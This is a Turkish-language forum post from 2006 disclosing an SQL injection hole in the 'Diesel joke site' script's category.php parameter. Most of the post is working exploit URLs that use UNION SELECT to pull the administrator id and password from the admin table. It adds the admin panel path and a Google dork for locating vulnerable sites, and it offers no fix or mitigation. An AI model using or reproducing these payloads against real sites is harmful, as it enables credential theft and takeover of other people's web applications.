Diesel joke site kod çalıştırma açığı

Onur OKTAY
03-07-2006, 11:53   |  #1  
OP Yıllanmış Üye
Teşekkür Sayısı: 0
169 mesaj
Kayıt Tarihi:Kayıt: Şub 2006

Risk : Yüksek

Etkilenenler : Diesel joke site ->> category.php parametresi.

Etki : Sql Enjekte ederek, Uzaktan kod çalıştırma ve admin şifresine ulaşabilme.

Example & Exploits :

admin id;


to joke
script/category.php?id=-99%20union%20select%20aid,aid,aid,aid,aid,aid,ai
d,aid,aid,aid,aid,aid,aid,aid,aid%20from%20admin/*


password:

to joke
script/category.php?id=-99%20union%20select%20apass,apass,apass,apass,ap
ass,apass,apass,apass,apass,apass,apass,apass,apass,apass,apass%20from%2
0admin/*

aid= admin id
apass= pass of the admin

path to admin panel :


to jokes/admin


Google Dork : Diesel joke site-down

Diğer arama motorlarindan çeşitlendirebilirsiniz açığı.

Onur OKTAY